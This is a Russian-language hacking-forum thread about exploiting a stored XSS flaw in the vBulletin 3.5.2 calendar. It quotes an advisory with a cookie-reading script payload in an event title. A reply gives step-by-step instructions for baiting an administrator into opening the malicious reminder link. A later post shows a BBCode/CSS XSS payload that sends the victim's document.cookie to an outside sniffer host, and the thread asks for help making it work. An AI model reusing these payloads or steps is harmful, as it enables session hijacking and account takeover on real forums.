Форум АНТИЧАТ - Как использовать эту уязвимость в vBulletin 3.5.2?

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - Как использовать эту уязвимость в vBulletin 3.5.2? (https://forum.antichat.xyz/showthread.php?t=13212)

Как использовать эту уязвимость в vBulletin 3.5.2?

Если не трудно объясните куда её внедрить... эту xss, в клендарь... но куда именно

Vulnerability:
--------------------
Html_Injection :
The software does not properly filter HTML tags in the title of events before being passed to user in 'calendar.php'&'reminder.php AS include'. that may allow a remote user to inject HTML/javascript codes to events of calendar. The hostile code may be rendered in the web browser of the victim user who will Request Reminder for those Events (persistent).
For example an attacker creates new event (Single-All Day Event , Ranged Event OR Recurring Event)with this content:

TITLE:--------->Test<script>alert(document.cookie)</script>
BODY:---------->No matter
OTHER OPTIONS:->No matter

The hostile code will be rendered in the web browser of the victim user who will Request Reminder for this Event via http://example.com/vbulletin/calenda...addreminder&e=[eventid]
The hostile code will originate from the site running the Vbulletin software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies),or take actions on the site acting as the target user.

http://www.securitylab.ru/vulnerabil...rce/243694.php

Читаю читаю не могу понять(с английским у меня трудновато)...

Весьма просто!

Кстати первая уязвимость, которую я использовал)
Знач суть такова, что в заголовке не фильтруется текст на javascript.
Создаешь в календаре событие(желательно на сл.год ;) ) с заголовком, содержащем XSS.
Создал? смотри ссылку в браузере - там после &е= будет число.
Далее подставляешь - http://example.com/vbulletin/calenda...addreminder&e=[тут число]
впариваешь эту ссылку админу и будет тебе счастье.

Эта уязвимость работает на 3.5.0 версии?

должна работать. В исходнике написано что и ранние версии тоже могут быть уязвимы.

Ребята вы мне подскажите что я тут не так сделал?

Код HTML:

[EMAIL=[URL=s as=`s@wew.ew]mailto:assss@wew.ew ]

sssssss[/URL][/EMAIL]` style=`background:url(javaSCrip        t:document.Images[1].src="htt"+"p"+":"+"/"+"/"+"antichat.org/s/Electro.gif?"+document.cookie)`

Алерт есть, и этот сплойт не палится но на сниффе ничего :(

Ты через Оперу может сидишь? Если да то попробуй через Ie

Цитата:

Сообщение от Barsik

Ты через Оперу может сидишь? Если да то попробуй через Ie

Неа я под ИЕ